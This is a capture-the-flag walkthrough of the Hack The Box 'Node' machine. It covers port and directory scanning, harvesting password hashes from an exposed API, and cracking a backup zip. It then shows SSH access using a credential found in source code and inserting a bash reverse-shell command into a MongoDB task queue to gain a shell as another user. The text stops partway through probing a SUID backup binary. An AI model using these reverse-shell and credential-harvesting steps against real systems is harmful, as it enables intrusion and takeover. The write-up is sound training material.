Hackthebox Node Walkthrough Link to heading
Initial Enumeration Link to heading
Port Scan Link to heading
sudo nmap -sS -p- -Pn -T4 --min-rate 10000 -oN alltcp.txt 10.10.10.58 1 ⨯
[sudo] password for rocky:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-30 19:43 EDT
Stats: 0:00:03 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 24.10% done; ETC: 19:43 (0:00:09 remaining)
Nmap scan report for 10.10.10.58
Host is up (0.049s latency).
Not shown: 65533 filtered ports
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp
$ sudo nmap -sU -p- -Pn -T4 --min-rate 10000 -oN alludp.txt 10.10.10.58 1 ⨯
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-30 19:57 EDT
Nmap scan report for 10.10.10.58
Host is up.
All 65535 scanned ports on 10.10.10.58 are open|filtered
Vulnarability Scan Link to heading
ocky㉿kali)-[~/hckbox/node]
└─$ nmap -Pn -p 22,3000 -sC -sV -oN details.txt 10.10.10.58
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2022-03-30 20:04 EDT
Nmap scan report for 10.10.10.58
Host is up (0.049s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 dc:5e:34:a6:25:db:43:ec:eb:40:f4:96:7b:8e:d1:da (RSA)
| 256 6c:8e:5e:5f:4f:d5:41:7d:18:95:d1:dc:2e:3f:e5:9c (ECDSA)
|_ 256 d8:78:b8:5d:85:ff:ad:7b:e6:e2:b5:da:1e:52:62:36 (ED25519)
3000/tcp open hadoop-tasktracker Apache Hadoop
| hadoop-datanode-info:
|_ Logs: /login
| hadoop-tasktracker-info:
|_ Logs: /login
|_http-title: MyPlace
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
We can see 2 ports open and on port 3000 apache service seems running. This is how the page lookes on port 3000
Directrory Scan Link to heading
gobuster dir -u http://10.10.10.58:3000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --wildcard 1 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.10.58:3000
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/30 20:19:36 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 200) [Size: 3861]
/index (Status: 200) [Size: 3861]
/2006 (Status: 200) [Size: 3861]
/download (Status: 200) [Size: 3861]
/serial (Status: 200) [Size: 3861]
/crack (Status: 200) [Size: 3861]
/full (Status: 200) [Size: 3861]
/warez (Status: 200) [Size: 3861]
/news (Status: 200) [Size: 3861]
/contact (Status: 200) [Size: 3861]
/12 (Status: 200) [Size: 3861]
/about (Status: 200) [Size: 3861]
/search (Status: 200) [Size: 3861]
/spacer (Status: 200) [Size: 3861]
/privacy (Status: 200) [Size: 3861]
/11 (Status: 200) [Size: 3861]
/logo (Status: 200) [Size: 3861]
Since it has large number of folder, to get a GUI view you can use the scan from gui as well . This helps to understand the tree structure of website
Or for easier review, write the output to a file using -o flag
gobuster dir -u http://10.10.10.58:3000/ -w /usr/share/wordlists/dirb/common.txt -o directory.txt
None of these directories gave any hint for exploit. I have thought of doing a bruteforce and i tried all 3 usernames menetioned on website page. It shows no usernames are valid.
After checking the http requests through BURP, the websites Express, which is nodejs based application used on websites to handle java queries. You see from BURP that many java requests are used when we access the site.
With the BURP if you analyze the each user requests( tom,mark) you can see “is_admin” marked as false.
I could not find and valid usernamed from GUI, so i have decided to use the curl request. To do this we need to the program structure( how Express software handles the java requests for this website)
In the BURP we can see this how the user profile requests are handled
Using the Curl i can see in more specific way for these users
└─$ curl -s 10.10.10.58:3000/api/users/tom
{"_id":"59a7368398aa325cc03ee51d","username":"tom","password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240","is_admin":false}
┌──(rocky㉿kali)-[~]
└─$ curl -s 10.10.10.58:3000/api/users/mark
{"_id":"59a7368e98aa325cc03ee51e","username":"mark","password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73","is_admin":false}
For all users displayed on website, the curl request shows as below
$ curl -s 10.10.10.58:3000/api/users/latest 127 ⨯
[{"_id":"59a7368398aa325cc03ee51d","username":"tom","password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240","is_admin":false},{"_id":"59a7368e98aa325cc03ee51e","username":"mark","password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73","is_admin":false},{"_id":"59aa9781cced6f1d1490fce9","username":"rastating","password":"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0","is_admin":false}]
All the users are marked as “is_admin” as false in above request. I have removed the “latest” from above query to see if any hidden users and password is shown
curl -s 10.10.10.58:3000/api/users/
[{"_id":"59a7365b98aa325cc03ee51c","username":"myP14ceAdm1nAcc0uNT","password":"dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af","is_admin":true},{"_id":"59a7368398aa325cc03ee51d","username":"tom","password":"f0e2e750791171b0391b682ec35835bd6a5c3f7c8d1d0191451ec77b4d75f240","is_admin":false},{"_id":"59a7368e98aa325cc03ee51e","username":"mark","password":"de5a1adf4fedcce1533915edc60177547f1057b61b7119fd130e1f7428705f73","is_admin":false},{"_id":"59aa9781cced6f1d1490fce9","username":"rastating","password":"5065db2df0d4ee53562c650c29bacf55b97e231e3fe88570abc9edd8b78ac2f0","is_admin":false}]
curl -s 10.10.10.58:3000/api/users/myP14ceAdm1nAcc0uNT
{"_id":"59a7365b98aa325cc03ee51c","username":"myP14ceAdm1nAcc0uNT","password":"dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af","is_admin":true}
We have new user found which we need to crack the hashes. I have used crackstation website and the hashes are cracked as follows:
The downloaded image is not readable, So i have decoded using base64 and still not readable
─(rocky㉿kali)-[~/hckbox/node]
└─$ cat myplace.backup| base64 -d > newbackup.decoded 1 ⨯
To view the properties of decoded file
─$ file newbackup.decoded 130 ⨯
newbackup.decoded: Zip archive data, at least v1.0 to extract
Lets rename to zip file now and unzip it
(rocky㉿kali)-[~/hckbox/node]
└─$ mv newbackup.decoded newbackup.zip
┌──(rocky㉿kali)-[~/hckbox/node]
└─$ unzip newbackup.zip
Archive: newbackup.zip
creating: var/www/myplace/
[newbackup.zip] var/www/myplace/package-lock.json password:
This requires a password and we need to crack the zip with john to get passowrd.
As this is a zip file we need to use the script from John for converting this to a hash value. The scripts are usually located under /usr/share/john
The First command gives lot of warnings.
┌──(rocky㉿kali)-[/usr/share/john]
└─$ sudo zip2john ~/hckbox/node/newbackup.zip > ~/hckbox/node/newbackup.hashes 1 ⨯
[sudo] password for rocky:
newbackup.zip/var/www/myplace/ is not encrypted!
ver 1.0 /home/rocky/hckbox/node/newbackup.zip/var/www/myplace/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/package-lock.json PKZIP Encr: 2b chk, TS_chk, cmplen=4404, decmplen=21264, crc=37EF7D4C
ver 1.0 /home/rocky/hckbox/node/newbackup.zip/var/www/myplace/node_modules/ is not encrypted, or stored with non-handled compression type
ver 1.0 /home/rocky/hckbox/node/newbackup.zip/var/www/myplace/node_modules/serve-static/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/serve-static/README.md PKZIP Encr: 2b chk, TS_chk, cmplen=2733, decmplen=7508, crc=9C88B932
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/serve-static/index.js PKZIP Encr: 2b chk, TS_chk, cmplen=1640, decmplen=4533, crc=211D4438
es/merge-descriptors/LICENSE PKZIP Encr: 2b chk, TS_chk, cmplen=701, decmplen=1167, crc=E5199DFD
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/merge-descriptors/HISTORY.md PKZIP Encr: 2b chk, TS_chk, cmplen=212, decmplen=363, crc=B39B861C
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/merge-descriptors/package.json PKZIP Encr: 2b chk, TS_chk, cmplen=791, decmplen=1973, crc=7DF9E1F4
ver 1.0 /home/rocky/hckbox/node/newbackup.zip/var/www/myplace/node_modules/media-typer/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/media-typer/README.md PKZIP Encr: 2b chk, TS_chk, cmplen=824, decmplen=2371, crc=FC21E3D4
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/media-typer/index.js PKZIP Encr: 2b chk, TS_chk, cmplen=2153, decmplen=6375, crc=954EE4EC
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/media-typer/LICENSE PKZIP Encr: 2b chk, TS_chk, cmplen=654, decmplen=1089, crc=EEDA1571
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/media-typer/HISTORY.md PKZIP Encr: 2b chk, TS_chk, cmplen=238, decmplen=461, crc=831BFF63
/on-finished/HISTORY.md PKZIP Encr: 2b chk, TS_chk, cmplen=671, decmplen=1694, crc=A7755A8F
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/on-finished/package.json PKZIP Encr: 2b chk, TS_chk, cmplen=842, decmplen=1973, crc=69CB31FE
ver 1.0 /home/rocky/hckbox/node/newbackup.zip/var/www/myplace/node_modules/encodeurl/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/encodeurl/README.md PKZIP Encr: 2b chk, TS_chk, cmplen=1358, decmplen=3613, crc=8B7C0973
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/encodeurl/index.js PKZIP Encr: 2b chk, TS_chk, cmplen=776, decmplen=1584, crc=4A7F0ECB
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/encodeurl/LICENSE PKZIP Encr: 2b chk, TS_chk, cmplen=654, decmplen=1089, crc=B05A5771
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/encodeurl/HISTORY.md PKZIP Encr: 2b chk, TS_chk, cmplen=118, decmplen=159, crc=EC7CEBBF
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/encodeurl/package.json PKZIP Encr: 2b chk, TS_chk, cmplen=872, decmplen=2046, crc=2FADFBCD
ver 1.0 /home/rocky/hckbox/node/newbackup.zip/var/www/myplace/node_modules/type-is/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/type-is/README.md PKZIP Encr: 2b chk, TS_chk, cmplen=1480, decmplen=4161, crc=DC8E6598
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/type-is/index.js PKZIP Encr: 2b chk, TS_chk, cmplen=1835, decmplen=5525, crc=D02938BD
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/type-is/LICENSE PKZIP Encr: 2b chk, TS_chk, cmplen=705, decmplen=1172, crc=64AADF93
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/type-is/HISTORY.md PKZIP Encr: 2b chk, TS_chk, cmplen=1077, decmplen=3923, crc=D6966BE8
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/type-is/package.json PKZIP Encr: 2b chk, TS_chk, cmplen=926, decmplen=2206, crc=EAC9E6F2
ver 1.0 /home/rocky/hckbox/node/newbackup.zip/var/www/myplace/node_modules/parseurl/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/parseurl/README.md PKZIP Encr: 2b chk, TS_chk, cmplen=1079, decmplen=3463, crc=C0082F23
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/parseurl/index.js PKZIP Encr: 2b chk, TS_chk, cmplen=886, decmplen=2425, crc=9CEDEE92
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/parseurl/LICENSE PKZIP Encr: 2b chk, TS_chk, cmplen=700, decmplen=1168, crc=5428B6A9
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/parseurl/HISTORY.md PKZIP Encr: 2b chk, TS_chk, cmplen=370, decmplen=832, crc=D36C9E89
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/parseurl/package.json PKZIP Encr: 2b chk, TS_chk, cmplen=870, decmplen=2018, crc=14F24EA9
ver 1.0 /home/rocky/hckbox/node/newbackup.zip/var/www/myplace/node_modules/resolve-from/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/resolve-from/index.js PKZIP Encr: 2b chk, TS_chk, cmplen=294, decmplen=532, crc=EA419ACB
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/resolve-from/package.json PKZIP Encr: 2b chk, TS_chk, cmplen=669, decmplen=1605, crc=6DF22948
les/fresh/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/fresh/README.md PKZIP Encr: 2b chk, TS_chk, cmplen=1336, decmplen=3236, crc=9E3E393F
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/fresh/index.js PKZIP Encr: 2b chk, TS_chk, cmplen=756, decmplen=1740, crc=22ACD7E3
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/fresh/LICENSE PKZIP Encr: 2b chk, TS_chk, cmplen=711, decmplen=1174, crc=F9A49A45
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/fresh/HISTORY.md PKZIP Encr: 2b chk, TS_chk, cmplen=538, decmplen=1220, crc=4209F5B1
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/fresh/package.json PKZIP Encr: 2b chk, TS_chk, cmplen=905, decmplen=2132, crc=2D265872
ver 1.0 /home/rocky/hckbox/node/newbackup.zip/var/www/myplace/node_modules/mime-db/ is not encrypted, or stored with non-handled compression type
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/mime-db/README.md PKZIP Encr: 2b chk, TS_chk, cmplen=1580, decmplen=3698, crc=7EBAE334
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/mime-db/index.js PKZIP Encr: 2b chk, TS_chk, cmplen=129, decmplen=136, crc=5C777A15
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/mime-db/LICENSE PKZIP Encr: 2b chk, TS_chk, cmplen=664, decmplen=1099, crc=703F5655
ver 2.0 efh 5455 efh 7875 newbackup.zip/var/www/myplace/node_modules/mime-db/HISTORY.md PKZIP Encr: 2b chk, TS_chk, cmplen=2026, decmplen=7912, crc=4CB89A0D
mongodb-core/lib/connection/logger.js PKZIP Encr: 2b chk, TS_chk, cmplen=1355, decmplen=6219, crc=8FA81201
crc=6BDBF084
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
So Use this command to suppress these warnings
┌──(rocky㉿kali)-[/usr/share/john]
└─$ sudo zip2john ~/hckbox/node/newbackup.zip 2>/dev/null > tee ~/hckbox/node/newbackup.hashes
┌──(rocky㉿kali)-[/usr/share/john]
└─$ head ~/hckbox/node/newbackup.hashes 1 ⨯
newbackup.zip:$pkzip2$3*2*1*0*8*24*9c88*1223*e0af0f04a36d44530af05c2a7e10141069f4e924d664c5cae80577db1922cdba9f715cae*1*0*8*24*37ef*0145*5559cbc60694621e9f201804b78c8ff7cae08157768c13b80f878f5091f72d7394374bde*2*0*11*5*118f1dfc*94cb*67*0*11*118f*3d0f*3339585e708a5ddb3b65e439900c62bab3*$/pkzip2$::newbackup.zip:var/www/myplace/node_modules/qs/.eslintignore, var/www/myplace/node_modules/serve-static/README.md, var/www/myplace/package-lock.json:/home/rocky/hckbox/node/newbackup.zip
As we can see the format is pkzip. John has craked this fast for me.
sudo john ~/hckbox/node/newbackup.hashes --wordlist=/usr/share/wordlists/rockyou.txt --format=pkzip
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
magicword (newbackup.zip)
1g 0:00:00:00 DONE (2022-04-01 21:53) 50.00g/s 9420Kp/s 9420Kc/s 9420KC/s sandrad..becky101
Use the "--show" option to display all of the cracked passwords reliably
Session completed
We can unzip now with passowrd craked. Its a “var” folder
Initial shell as Mark Link to heading
Under the VAR folder we can see the mongodb reference and a password
ls
app.html app.js node_modules package.json package-lock.json static
┌──(rocky㉿kali)-[~/…/zipstore/var/www/myplace]
└─$ cat app.js
const express = require('express');
const session = require('express-session');
const bodyParser = require('body-parser');
const crypto = require('crypto');
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const path = require("path");
const spawn = require('child_process').spawn;
const app = express();
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
const backup_key = '45fac180e9eee72f4fd2d9386ea7033e52b7c740afc3d98a8d0230167104d474';
This line seems to have the password for SSH user mark
const url = ‘mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace’;
ssh mark@10.10.10.58 6 ⨯
The authenticity of host '10.10.10.58 (10.10.10.58)' can't be established.
ED25519 key fingerprint is SHA256:l5rO4mtd28sC7Bh8t7rHpUxqmHnGYUDxX1DHmLFrzrk.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.58' (ED25519) to the list of known hosts.
mark@10.10.10.58's password:
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
.-.
.-'``(|||)
,`\ \ `-`. 88 88
/ \ '``-. ` 88 88
.-. , `___: 88 88 88,888, 88 88 ,88888, 88888 88 88
(:::) : ___ 88 88 88 88 88 88 88 88 88 88 88
`-` ` , : 88 88 88 88 88 88 88 88 88 88 88
\ / ,..-` , 88 88 88 88 88 88 88 88 88 88 88
`./ / .-.` '88888' '88888' '88888' 88 88 '8888 '88888'
`-..-( )
`-`
The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.
Last login: Wed Sep 27 02:33:14 2017 from 10.10.14.3
mark@node:~$ whoami
mark
mark@node:~$ pwd
/home/mark
mark@node:~$
After login, i could not get any user flag. The user flag is placed under user"tom" home directory.However “mark” dont have read access to this file.
mark@node:/tmp$ cd /home
mark@node:/home$ cd tom
mark@node:/home/tom$ ls -al
total 40
drwxr-xr-x 6 root root 4096 Sep 3 2017 .
drwxr-xr-x 5 root root 4096 Aug 31 2017 ..
-rw-r--r-- 1 root root 220 Aug 29 2017 .bash_logout
-rw-r--r-- 1 root root 3771 Aug 29 2017 .bashrc
drwx------ 2 root root 4096 Aug 29 2017 .cache
drwxr-xr-x 3 root root 4096 Aug 30 2017 .config
-rw-r----- 1 root root 0 Sep 3 2017 .dbshell
-rwxr-xr-x 1 root root 0 Aug 30 2017 .mongorc.js
drwxrwxr-x 2 root root 4096 Aug 29 2017 .nano
drwxr-xr-x 5 root root 4096 Aug 31 2017 .npm
-rw-r--r-- 1 root root 655 Aug 29 2017 .profile
-rw-r----- 1 root tom 33 Sep 3 2017 user.txt
Privilege escalation to Tom Link to heading
These are the process runnings as “tom”
mark@node:/tmp$ ps aux | grep tom
tom 1217 0.0 4.7 1074616 36356 ? Ssl Apr02 0:14 /usr/bin/node /var/scheduler/app.js
tom 1232 0.6 7.0 1051876 53628 ? Ssl Apr02 9:49 /usr/bin/node /var/www/myplace/app.js
mark 16329 0.0 0.1 14228 1012 pts/1 S+ 01:19 0:00 grep --color=auto tom
The contents of the file"/var/www/myplace/app.js" was already known to us as this was under the backup folder we downloaded.
After reviweing the contents of “/var/scheduler/app.js” we get a database name/username /password to connect the mongodb database.
cat /var/scheduler/app.js
const exec = require('child_process').exec;
const MongoClient = require('mongodb').MongoClient;
const ObjectID = require('mongodb').ObjectID;
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/scheduler?authMechanism=DEFAULT&authSource=scheduler';
Connecting to mongodb database
mongo -u mark -p 5AYRft73VtFpc84k scheduler
MongoDB shell version: 3.2.16
connecting to: scheduler
> show collections
tasks
> db.tasks.find()
The “db.tasks.find” shows no objects in it. For testing , i am trying add a command to create a test file under /tmp folder using “db.tasks.insert” command
> db.tasks.insert({"cmd": "touch /tmp/rchitect"})
WriteResult({ "nInserted" : 1 })
> db.tasks.find()
{ "_id" : ObjectId("6248ee57a5adbbf2bcbcf981"), "cmd" : "touch /tmp/rchitect" }
After 30 sec the tasks are empy
> db.tasks.find()
{ "_id" : ObjectId("6248ee57a5adbbf2bcbcf981"), "cmd" : "touch /tmp/rchitect" }
> db.tasks.find()
>
Now instead of reverse shell insert the reverse shell code as follows and we have the reverse shell in 30 sec.
> db.tasks.insert({"cmd": "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.3/8989 0>&1'"})
WriteResult({ "nInserted" : 1 })
> db.tasks.find()
{ "_id" : ObjectId("6248f1bea5adbbf2bcbcf982"), "cmd" : "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.3/8989 0>&1'" }
Reverse shell as Tom
┌──(rocky㉿kali)-[~]
└─$ rlwrap nc -nvlp 8989
listening on [any] 8989 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.58] 44328
bash: cannot set terminal process group (1217): Inappropriate ioctl for device
bash: no job control in this shell
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
tom@node:/$
Privilege escalation to root Link to heading
Sudo -l asks for passoword of “tom” which i dont have.
Next steps was to look for any suid files
find / -perm /4000 2> /dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/local/bin/backup
/usr/bin/chfn
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/newgidmap
/usr/bin/chsh
/usr/bin/sudo
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/newuidmap
/bin/ping
/bin/umount
/bin/fusermount
/bin/ping6
/bin/ntfs-3g
/bin/su
/usr/local/bin/backup is unknown suid file.
I can also see the user “tom” belongs to a admin group
id
uid=1000(tom) gid=1000(tom) groups=1000(tom),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),115(lpadmin),116(sambashare),1002(admin)
The file “/usr/local/bin/backup” also belongs to group “admin”
ls -al /usr/local/bin/backup
-rwsr-xr-- 1 root admin 16484 Sep 3 2017 /usr/local/bin/backup
$
It seems an excecutable file and this program is doing the backup we downloaded initially.
/usr/local/bin/
file backup
backup: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=343cf2d93fb2905848a42007439494a2b4984369, not stripped
strings backup
/lib/ld-linux.so.2
libc.so.6
_IO_stdin_used
setuid
strcpy
exit
sprintf
srand
fopen
strncpy
puts
time
clock
getpid
fgets
strstr
strcspn
fclose
strcat
remove
system
geteuid
strchr
access
strcmp
__libc_start_main
__gmon_start__
GLIBC_2.1
GLIBC_2.0
PTRh
WVSQ
Y[^_]
UWVS
t$,U
[^_]
[37m
[33m
%s[!]%s %s
[32m
%s[+]%s %s
%s[+]%s Starting archiving %s
____________________________________________________
/ \
| _____________________________________________ |
| | | |
| | Secure Backup v1.0 | |
| |_____________________________________________| |
| |
\_____________________________________________________/
\_______________________________________/
_______________________________________________
_-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_
_-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_
_-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
_-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_
_-'.-.-.-.-.-. .---.-. .-----------------------------. .-.---. .---.-.-.-.`-_
:-----------------------------------------------------------------------------:
`---._.-----------------------------------------------------------------._.---'
Could not open file
Validated access token
Ah-ah-ah! You didn't say the magic word!
Finished! Encoded backup is below:
UEsDBDMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAcm9vdC50eHQBmQcAAgBBRQEIAEbBKBl0rFrayqfbwJ2YyHunnYq1Za6G7XLo8C3RH/hu0fArpSvYauq4AUycRmLuWvPyJk3sF+HmNMciNHfFNLD3LdkGmgwSW8j50xlO6SWiH5qU1Edz340bxpSlvaKvE4hnK/oan4wWPabhw/2rwaaJSXucU+pLgZorY67Q/Y6cfA2hLWJabgeobKjMy0njgC9c8cQDaVrfE/ZiS1S+rPgz/e2Pc3lgkQ+lAVBqjo4zmpQltgIXauCdhvlA1Pe/BXhPQBJab7NVF6Xm3207EfD3utbrcuUuQyF+rQhDCKsAEhqQ+Yyp1Tq2o6BvWJlhtWdts7rCubeoZPDBD6Mejp3XYkbSYYbzmgr1poNqnzT5XPiXnPwVqH1fG8OSO56xAvxx2mU2EP+Yhgo4OAghyW1sgV8FxenV8p5c+u9bTBTz/7WlQDI0HUsFAOHnWBTYR4HTvyi8OPZXKmwsPAG1hrlcrNDqPrpsmxxmVR8xSRbBDLSrH14pXYKPY/a4AZKO/GtVMULlrpbpIFqZ98zwmROFstmPl/cITNYWBlLtJ5AmsyCxBybfLxHdJKHMsK6Rp4MO+wXrd/EZNxM8lnW6XNOVgnFHMBsxJkqsYIWlO0MMyU9L1CL2RRwm2QvbdD8PLWA/jp1fuYUdWxvQWt7NjmXo7crC1dA0BDPg5pVNxTrOc6lADp7xvGK/kP4F0eR+53a4dSL0b6xFnbL7WwRpcF+Ate/Ut22WlFrg9A8gqBC8Ub1SnBU2b93ElbG9SFzno5TFmzXk3onbLaaEVZl9AKPA3sGEXZvVP+jueADQsokjJQwnzg1BRGFmqWbR6hxPagTVXBbQ+hytQdd26PCuhmRUyNjEIBFx/XqkSOfAhLI9+Oe4FH3hYqb1W6xfZcLhpBs4Vwh7t2WGrEnUm2/F+X/OD+s9xeYniyUrBTEaOWKEv2NOUZudU6X2VOTX6QbHJryLdSU9XLHB+nEGeq+sdtifdUGeFLct+Ee2pgR/AsSexKmzW09cx865KuxKnR3yoC6roUBb30Ijm5vQuzg/RM71P5ldpCK70RemYniiNeluBfHwQLOxkDn/8MN0CEBr1eFzkCNdblNBVA7b9m7GjoEhQXOpOpSGrXwbiHHm5C7Zn4kZtEy729ZOo71OVuT9i+4vCiWQLHrdxYkqiC7lmfCjMh9e05WEy1EBmPaFkYgxK2c6xWErsEv38++8xdqAcdEGXJBR2RT1TlxG/YlB4B7SwUem4xG6zJYi452F1klhkxloV6paNLWrcLwokdPJeCIrUbn+C9TesqoaaXASnictzNXUKzT905OFOcJwt7FbxyXk0z3FxD/tgtUHcFBLAQI/AzMDAQBjAG++IksAAAAA7QMAABgKAAAIAAsAAAAAAAAAIIC0gQAAAAByb290LnR4dAGZBwACAEFFAQgAUEsFBgAAAAABAAEAQQAAAB4EAAAAAA==
/root
/etc
/tmp/.backup_%i
/usr/bin/zip -r -P magicword %s %s > /dev/null
/usr/bin/base64 -w0 %s
The target path doesn't exist
;*2$"
GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.7200
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
backup.c
__FRAME_END__
__JCR_END__
I have tried to run the “backup” program and it did not work. These are the steps i tried
backup
backup test1
backup test1
backup test1 test2
backup test1 test2
Finally with 3 keywords i am able to run this
backup test1 test2 test3
____________________________________________________
/ \
| _____________________________________________ |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | Secure Backup v1.0 | |
| | | |
| | | |
| | | |
| | | |
| | | |
| | | |
| |_____________________________________________| |
| |
\_____________________________________________________/
\_______________________________________/
_______________________________________________
_-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_
_-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_
_-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_
